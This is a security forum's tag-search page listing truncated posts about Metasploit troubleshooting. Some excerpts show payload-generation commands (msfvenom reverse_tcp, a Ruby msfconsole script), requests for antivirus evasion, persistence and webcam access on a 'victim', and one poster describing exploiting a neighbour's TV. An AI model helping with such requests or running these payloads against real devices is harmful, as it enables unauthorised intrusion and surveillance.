Jump to content

Search the Community

Showing results for tags 'metasploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C虏
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. NOTE : THIS IS COMPLETELY FOR EDUCATIONAL PURPOSES AND I AM NOT TRYING TO HACK ANY DEVICE RIGHT NOW TO CREATE PROBLEM FOR SOMEONE .THE PHONE I AM TRYING TO EXPLOIT IS MY OWN SECOND DEVICE. I'm working with metasploit on TERMUX. So, My meterpreter session is open . I am able to access the SDCARD of the phone I am trying to exploit, but everytime I need to exploit the device, one needs to tap the app icon everytime for my meterpreter session to start. I want to create my payload persistent . So that, I don't have to wait for the user of the device to tap the icon again . So , I su
  2. I'm pretty new to Metasploit but I have what appears to be a successful shell/session created however there is no prompt (normal commands return nothing) and I see that it shows only the default route (0.0.0.0:0) between my computer and the target. I did input my LHOST though it is a staged bind shell payload (inline payload shells produce the same result and meterpreter payloads don't work). Is it possible to obtain a full interactive shell? =======================================================================================================================================
  3. Host OS: Windows 10 Pineapple Nano v. 2.7.0 VirtualBox v. 6.1.6 Kali Linux v. 2020.2 **Forward: I've been doing all this on my own private router, WiFi signal, computer, etc. Nothing illegal. Just trying to learn a new skill.** So I've been able to successfully capture a 4-way handshake (Both .CAP and.PCAP) using either the Pineapple Nano or Kali Linux> Successfully cracked the password of the WiFi AP using www.GPUHASH.me> And I can log into the "client" AP. I just don't know where to go from here and feel pretty dumb. How do I actually exploit the
  4. Hello guys, Before I start, I want to say that I looked on all the forums for a solution and tried multiple options until I started writing this. I have tried to make an exploit for Android. Everything works fine until I open the apk on my test phone where after I installed it by bypassing the security restrictions, it doesn't do anything. On msf it doesn't show that it's connected to a device. As well, regardless if I stop the exploit, kill it and remove it, the server is still up and contains the file. I need a solution since I believe that this is caused b
  5. Hi Guys need help with this problem im having so im trying to hack my samsung s7 edge with a meterpreter apk and when i install and open it on my phone nothing happens it still says started reverse_TCP handler on my ip address :4444 any fixes? sincerely, Kyran
  6. How do I actually increase the dimensions of the pictures while doing webcam stream and snap? I'm currently using on my android, and while I can increase the quality to 100, my pictures come very small. It's possible to take as the size of the camera of the cellphone, or at least increase it a little bit?
  7. Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help 馃槃
  8. Hello people....... tried to get a connection vie Meterpreter to mi Pineapple nano, but all the fuck i h get is this msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, pr
  9. I am trying to get more proficient with Metasploit. I have encountered an issue that has made me crazy the last few days. Using ms08_067_netapi in any manner I am getting: Handler failed to bind to xx.xxx.xx.x:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [-] xx.xxx.xx.x:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (xx.xxx.xx.x:445). [*] Exploit completed, but no session was created. I have found so much about this error but not the first full clear resolution. I have done so many things but so far I have been nulled. Any ideas
  10. There are soo less commands for android in metasploit. It would be okay But i didnt find the command i needed the most. It was something like vnc_start . I dont remember but i used it in windows a long time ago and i got to see what the victim is doing etc. So how will i do it for android too.? Please help me out in this
  11. Hi, I wanted to learn how to perform ATP attacks. I have a problem with creating a backdoor / payload that will not be detected by antivirus systems and which will give me access to the attacked computer via a reverse connection. I'm not a good programmer, but I thought I would create my own code that would give me a system shell using the SSH reverse tunnel. I find that if it will be my code it will not be detectable for AV. Unfortunately, the more I think about it, I come to the conclusion that once I have such a system shell, I still have to provide a meterpreter payload, which will a
  12. Hello am not sure if this is the right place to post but ill give it a try i've been trying to automate some tasks in metasploit using ruby. <ruby> # msfconsole commands hostsfile="host.txt" hosts=[] File.open(hostsfile,"r") do |f| f.each_line do |line| hosts.push line.strip end end self.run_single("use some exploit") self.run_single("set target 1") self.run_single("set rhosts 0.0.0.0") self.run_single("etg autorunscript multi_console_command") self.run_single("set rport 8080") self.run_single("set payload java/meterpreter/reverse_tcp") self.run_single("setg lhost <loca
  13. First thing first (1) Opening Terminal and typing following command:- "msfconsole" and getting this output:- so i ran that command in terminal did't worked out now after googling for 3 hrs i found many things which are here 1). i should run "bundle install" in this directory /usr/share/metasploit-framework after that i'm getting this error Now again after doing research i found that i've to update jason so ran following command "gem install json -v1.8.3" which gave me output as:- Please guys help me
  14. Hi There, I am new to the Metasploit or something related to security likes hacks. I have some question. 1) First question, how to offline update Metasploit, can i just update for the latest update (Nov 2018) or must be one by one ? Example: Must be updated from Jan'18 - Feb'18 - Mar'18 .. until Nov'18 2) OS Usage, mostly Metasploit use or launched from Kali Linux. How if i run from Windows 7, is there any mallfunction or can be caused the other target PC error ? 3) While i try to exploiting, there are many lines likes: - No Payloads were comp
  15. Hi Everyone. I am running a number of Metasploit modules for exploiting Siemens S7-300/400 and S7-1200 PLCs that were created from a Blackhat talk by Dillion Beresford in 2011. The modules are not supplied with Metasploit but have been added to the auxiliary/admin/scada/ directory. This is a link to the Modules https://github.com/moki-ics/s7-metasploit-modules The modules are showing up in Metasploit correctly and can be configured but when they are run there are a number of errors. Here is a link to a screen shot showing the errors: The module shown in the scr
  16. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  17. So heres whats going on i made a shell, using reverse_tcp. And i put it on victims computer and opened it everything went smoothly in the process of opening the exe, anyways after i opened it, the shell didnt send a tcp connection back to me. Im doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a vm then uploaded it to mediafire and downloaded on other pc. But when i ran it, i didnt get a connection back it was like it was never ran. Heres all my console output currently even after opening i didnt take a screenshot but i did co
  18. Hey guys, my problem is that I have just installed the Kali Linux VMware Image. I changed my pass and then I did an update (apt-get update && apt-get dist-upgrade). Now I get an error when I try to initialize the Metasploit databse with 鈥瀖sfdb init" : root@kali:~# msfdb reinit Database already started [+] Dropping databases 'msf' [+] Dropping databases 'msf_test' [+] Dropping database user 'msf' [+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml [+] Stopping database [+] Starting database [+] Creating database user 'msf'
  19. v0dka

    Payload timeout

    Hi. I met a problem recently : I have installed metasploit and it runs well in SSH. But when I tried to run it in in a payload, just like: /root/metasploit-framework/msfconsole & It will run for a while, I can find it with cmd "ps -aux | grep 'msfconsole' ". But it then disappeared! As it takes a long time for msf to startup. so I think maybe the payload has a timeout. I'm not sure what's wrong with it. Thanks in advance
  20. Hey there! I am Luuk a 14 year old boy who's very intrested in cyber security. When I was little [smaller] ;] I always dream about being a cool hacker. Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit [meterpreter payloads] I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;[ Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp
  21. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after i infected a machine. And also if S. E. T is working :) Thanks in advance :)
  22. Digging my way through metasploit using armitage on my pentest lab. I have three VMs (of 15 installed) running 1.metasploitable 2.Windows XP32 SP2 3.CentOS Nmap scan via Armitage is finding metasploitable and CentoS but not the Windows XP machine (which is kinda funny actually). However when I run Zenmap separately, it finds that machine. All VMs are in the same network. Am I missing something for metasploit to see a Windows machine? Interestingly when I review the output from the scan, there is a line that says "All 65535 scanned ports on {IP ADDRESS} are filtered...maybe
  23. blackcoat

    Meterpreter

    Fud backdoor with Pwnwinds with bat. format + Powershell is not connecting with metasploit listener.The backdoor was made by TheFatRat connection type :reverse https Attacked virtual box os type:windows 10
  24. Hello everyone, I am new here - this is very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP) However, it turns out that port forwarding isn't possible on IPV6 - in fact, it WOULD work if the victim uses IPV6 as well. I haven't confirmed that, anyway. ( please correct me if I am wrong here) My question is, is there any way to start a session as an IPV6 user, as in maybe an exploit that can
  25. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路路路路鈹 * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路路路路鈹 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 鈹偮穒路路鈹偮仿仿仿封攤路路路路鈹偮稵路路鈹 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 鈹偮仿仿仿封攤路i9p
×
×
  • Create New...